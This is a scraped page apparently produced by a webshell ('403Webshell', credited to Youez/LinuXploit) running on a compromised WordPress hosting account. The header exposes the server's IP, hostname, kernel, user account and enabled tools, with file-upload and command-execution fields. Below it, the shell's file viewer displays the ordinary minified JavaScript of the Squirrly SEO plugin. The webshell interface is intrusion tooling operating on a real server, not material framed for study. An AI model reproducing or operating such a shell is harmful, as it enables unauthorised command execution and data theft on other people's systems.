403Webshell
Server IP : 162.0.217.223  /  Your IP : 216.73.216.150
Web Server : LiteSpeed
System : Linux premium269.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : mypckeys ( 1539)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/mypckeys/yeslicense.org/wp-content/plugins/squirrly-seo/view/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mypckeys/yeslicense.org/wp-content/plugins/squirrly-seo/view/assets/js//global.min.js
(function($){"use strict";$.sq_setCookie=function(name,value){value=value.toString().replace(new RegExp("\\\\","g"),"");document.cookie=name+"="+encodeURIComponent(value)+"; expires="+60*24+"; path=/"};$.sq_getCookie=function(name){var nameEQ=name+"=";var ca=document.cookie.split(";");for(var i=0;i<ca.length;i++){var c=ca[i];while(c.charAt(0)==" ")c=c.substring(1,c.length);if(c.indexOf(nameEQ)==0)return decodeURIComponent(c.substring(nameEQ.length,c.length))}return null};$.sq_getHashParam=function(key){var urlparts=location.href.split("#");if(urlparts.length>=2){urlparts.shift();var queryString=urlparts.join("#");var results=new RegExp("[\\?&#]*"+key+"=([^&#]*)").exec(queryString);if(results){return results[1]||0}}return false};$.sq_setHashParam=function(key,val){var urlparts=location.href.split("#");if(urlparts.length>=2){var add=true;var urlBase=urlparts.shift();var queryString=urlparts.join("#");var prefix=encodeURIComponent(key)+"=";var pars=queryString.split(/[&;]/g);for(var i=pars.length;i-- >0;){if(pars[i].lastIndexOf(prefix,0)!==-1||pars[i]===""){pars[i]=pars[i].replace(pars[i],prefix+val);add=false;break}}add&&pars.push(prefix+val);location.href=urlBase+"#"+pars.join("&")}else{location.href+="#"+key+"="+val}};$.sq_getParam=function getUrlParameter(sParam){var sPageURL=window.location.search.substring(1),sURLVariables=sPageURL.split("&"),sParameterName,i;for(i=0;i<sURLVariables.length;i++){sParameterName=sURLVariables[i].split("=");if(sParameterName[0]===sParam){return sParameterName[1]===undefined?true:decodeURIComponent(sParameterName[1])}}return false};$.sq_loadChart=function(div){new Chart(div,{type:"bar",data:{labels:["","","","","","",""],datasets:[{data:div.data("values").split(","),borderWidth:0}]},options:{tooltips:{enabled:false},legend:{display:false},layout:{padding:{left:0,right:0,top:0,bottom:0}},title:{display:false},scales:{yAxes:[{display:false,ticks:{beginAtZero:true,min:0,max:1}}],xAxes:[{display:false,ticks:{beginAtZero:true}}]}}})};$.sq_showMessage=function(text,time){$(".sq_alert").remove();if(text.indexOf("<div>")==-1){text=$('<div class="sq_alert position-fixed fixed-top text-center text-white bg-success m-0 p-3 border border-white sq-position-fixed sq-fixed-top sq-text-center sq-text-white sq-bg-success sq-m-0 sq-p-3 sq-border sq-border-white">'+text+"</div>")}$("body").prepend(text);if(typeof time==="undefined"){time=3e3}setTimeout(function(){text.remove()},time);return text};$.fn.sq_addBriefcase=function(){var $this=this;$this.addClass("sq_minloading");$.post(sqQuery.ajaxurl,{action:"sq_briefcase_addkeyword",keyword:$this.data("keyword"),doserp:parseInt($this.data("doserp")),hidden:parseInt($this.data("hidden")),sq_nonce:sqQuery.nonce}).done(function(response){$this.removeClass("sq_minloading");if(typeof response.message!=="undefined"){$.sq_showMessage(response.message).addClass("sq_success");$this.closest("tr").addClass("bg-briefcase");$this.off("click");$this.addClass("bg-briefcase")}else if(typeof response.error!=="undefined"){$.sq_showMessage(response.error);$this.removeClass("sq_minloading")}else{$this.removeClass("sq_minloading");location.reload()}}).fail(function(){$this.removeClass("sq_minloading")})};$.fn.sq_listenLabels=function(){var $popup=this;$popup.find("input[type=checkbox]").click(function(){$popup.find("input[type=checkbox]").each(function(){if(!$(this).is(":checked")){$(this).next("label").removeClass("sq_active")}});if($(this).is(":checked")){$(this).next("label").addClass("sq_active")}});$popup.find(".sq_save_keyword_labels").on("click",function(){var $button=$(this);var $keyword=$(this).data("keyword");var $labels=[];$popup.find('input[name="sq_labels"]:checked').each(function(){$labels.push(this.value)});$button.addClass("sq_minloading");$.post(sqQuery.ajaxurl,{action:"sq_briefcase_keywordlabel",keyword:$keyword,labels:$labels,sq_nonce:sqQuery.nonce}).done(function(response){if(typeof response.saved!=="undefined"){$button.removeClass("sq_minloading");$button.closest("tr").addClass("bg-briefcase");$button.closest("tr").find(".sq_research_add_briefcase").addClass("bg-briefcase");$.sq_showMessage(response.saved)}else if(typeof response.error!=="undefined"){$button.removeClass("sq_minloading");$.sq_showMessage(response.error).addClass("sq_error")}$popup.modal("hide")}).fail(function(){$button.removeClass("sq_minloading")},"json")})};$.fn.sq_addInnerlinks=function(){var $this=this;$this.addClass("sq_minloading");$.post(sqQuery.ajaxurl,{action:"sq_focuspages_addinnerlink",keyword:$this.data("keyword"),from_post_id:parseInt($this.data("from_post_id")),to_post_id:parseInt($this.data("to_post_id")),nofollow:$this.data("nofollow"),blank:$this.data("blank"),sq_nonce:sqQuery.nonce}).done(function(response){$this.removeClass("sq_minloading");if(typeof response.success!=="undefined"&&typeof response.data!=="undefined"){if(response.success){$.sq_showMessage(response.data).addClass("sq_success");$this.off("click");$this.addClass("bg-briefcase")}else{$.sq_showMessage(response.data,5e3).addClass("sq_error");$this.removeClass("sq_minloading")}}else{$this.removeClass("sq_minloading");location.reload()}}).fail(function(){$this.removeClass("sq_minloading")})};$.fn.sq_ajaxForm=function(){var $this=this;var $javascript=$this.data("javascript");return $.post(sqQuery.ajaxurl,$this.serialize()).done(function(response){if(typeof response.data!=="undefined"){if(response.data===""){$("#wpbody-content").prepend("Saved")}else{$("#wpbody-content").prepend(response.data)}}else if(typeof response.error!=="undefined"){$.sq_showMessage(response.error)}if(typeof $javascript!=="undefined"){eval($javascript)}$(".sq_minloading").removeClass("sq_minloading");$(".sq_loading").removeClass("sq_loading")}).fail(function(){if(typeof $javascript!=="undefined"){eval($javascript)}$(".sq_minloading").removeClass("sq_minloading");$(".sq_loading").removeClass("sq_loading")},"json");return false};$.fn.sq_listenAjaxSearch=function(){var $this=this;$this.selectpicker().ajaxSelectPicker({ajax:{url:sqQuery.ajaxurl,type:"POST",dataType:"json",data:{action:"sq_ajax_search_pages",q:"{{{q}}}",sq_nonce:sqQuery.nonce}},preprocessData:function(response){if(typeof response.success!=="undefined"&&response.success){if(typeof response.data!=="undefined"){var i,l=response.data.length,array=[];if(l){for(i=0;i<l;i++){array.push($.extend(true,response.data[i],{text:$("<textarea/>").html(response.data[i].title).val(),value:response.data[i].ID,data:{subtext:" "+$("<textarea/>").html(decodeURIComponent(response.data[i].url)).val()+" (id: "+response.data[i].ID+")"}}))}}return array}}return[]}})};$.fn.sq_ajaxCallListen=function(){var $this=this;var $input=$("#"+$this.data("input"));var $confirm=$this.data("confirm");var $action=$this.data("action");var $redirect=$this.data("redirect");var $javascript=$this.data("javascript");var $name=$this.data("name");var $value=$this.data("value");if(!$input.length){$input=$this}if(typeof $confirm!=="undefined"){if(!confirm($confirm))return}if($input.is("input")&&$input.attr("type")==="checkbox"){if($input.is(":checked")){$value=$input.val()}}else{if($input.is("select")){$value=$input.find("option:selected").val()}else{if($input.is("input")&&$input.val()!==""){$value=$input.val()}}}$this.addClass("sq_minloading");if($action!==""&&$value!==""){return $.post(sqQuery.ajaxurl,{action:$action,input:$name,value:$value,referal:location.href,sq_nonce:sqQuery.nonce}).done(function(response){if(typeof response.data!=="undefined"){if(response.data===""){$("#wpbody-content").prepend("Saved")}else{$("#wpbody-content").prepend(response.data)}if(response.assistant!==""&&response.assistant_dest){var show_url=$(".sq_assistant").find("ul:visible").attr("id");$(response.assistant_dest).html(response.assistant);if(show_url)$("#"+show_url).show()}setTimeout(function(){$this.removeClass("sq_minloading");if(typeof $javascript!=="undefined"){eval($javascript)}else if(typeof $redirect!=="undefined"){window.open($redirect,"_blank")}else{location.reload()}},1e3)}else if(typeof response.error!=="undefined"){$.sq_showMessage(response.error);$this.removeClass("sq_minloading")}else{$this.removeClass("sq_minloading");location.reload()}}).fail(function(){$this.removeClass("sq_minloading")},"json")}};$.fn.sq_getAccount=function(){var $this=this;$this.addClass("sq_minloading");$.post(sqQuery.ajaxurl,{action:"sq_ajax_account_getaccount",sq_nonce:sqQuery.nonce}).done(function(response){if(typeof response!=="undefined"){if(typeof response.html!=="undefined"){$this.html(response.html);$this.find(".sq_account_info_avatar").on("click",function(){$this.find(".sq_account_info_content").toggle()})}}$this.removeClass("sq_minloading")}).fail(function(){$this.removeClass("sq_minloading")},"json")};$.fn.sq_clearCache=function(){$.post(sqQuery.ajaxurl,{action:"sq_seosettings_clear_cache",sq_nonce:sqQuery.nonce})};$.fn.sq_subMenuListen=function(){var $this=this;var unsaved=false;$this.find(".sq_sub_nav_item").on("click",function(ev){ev.preventDefault();$this.find(".tab-panel").hide();if($this.find("#"+$(this).data("tab")).length>0){$this.find("#"+$(this).data("tab")).show();$this.find("."+$(this).data("tab")).show();$.sq_setHashParam("tab",$(this).data("tab"))}$this.find(".sq_sub_nav_item").removeClass("active");$this.find(".sq_sub_nav_item[data-tab="+$(this).data("tab")+"]").addClass("active")});if($.sq_getHashParam("tab")){var $current=$.sq_getHashParam("tab");$this.find(".tab-panel").hide();$this.find(".sq_sub_nav_item").removeClass("active");$this.find("#"+$current).show();$this.find("."+$current).show();$this.find(".sq_sub_nav_item[data-tab="+$current+"]").addClass("active")}else{$this.find("a.sq_nav_item:first").addClass("active");$this.find("a.sq_nav_item:first").trigger("click")}$this.find("input.sq-switch").not(".nopopup").change(function(){if($("div."+$(this).attr("name")).length){if($(this).prop("checked")){$("div."+$(this).attr("name")).show()}else{$("div."+$(this).attr("name")).hide()}}else if($("div."+$(this).attr("id")).length){if($(this).prop("checked")){$("div."+$(this).attr("id")).show()}else{$("div."+$(this).attr("id")).hide()}}});$this.find("input.sq-switch").each(function(){if(!$(this).prop("checked")){if($("div."+$(this).attr("name")).length){$("div."+$(this).attr("name")).hide()}else if($("div."+$(this).attr("id")).length){$("div."+$(this).attr("id")).hide()}}})};$(document).ready(function(){if($(".sq_account_info").length>0){$(".sq_account_info").sq_getAccount()}$("#sq_wrap").sq_subMenuListen();if($(".sq_save_ajax").length>0){$(".sq_save_ajax").find("input").on("change",function(){$(this).sq_ajaxCallListen()});$(".sq_save_ajax").find("input[type=image]").on("click",function(){$(this).sq_ajaxCallListen()});$(".sq_save_ajax").find("button").on("click",function(){$(this).sq_ajaxCallListen()})}$("form.sq_save_ajax_form").on("submit",function(){return $(this).sq_ajaxForm()});$(".sq_selectpicker").each(function(){$(this).sq_listenAjaxSearch()});$("button.show_advanced").on("click",function(){$(".sq_advanced").show();$("button.show_advanced").hide();$("button.hide_advanced").show()});$("button.hide_advanced").on("click",function(){$(".sq_advanced").hide();$("button.hide_advanced").hide();$("button.show_advanced").show()});$("button[type=submit]").not(".noloading").on("click",function(){$(this).addClass("sq_minloading")});$("form#sq_register").on("submit",function(){$(this).find("button[type=submit]").addClass("sq_minloading")});$("input.sq_patterns_doseo").on("click",function(){var $pattern=$(this).data("pattern");if($(this).is(":checked")){$(".sq_doseo_"+$pattern).hide();$(".sq_patterns_"+$pattern+"_doseo").show()}else{$(".sq_doseo_"+$pattern).show();$(".sq_patterns_"+$pattern+"_doseo").hide()}$("form.sq_save_ajax_form").sq_ajaxForm().done(function(){$(".sq_patterns_doseo").prop("disabled",false)})})})})(jQuery);

Youez - 2016 - github.com/yon3zu
LinuXploit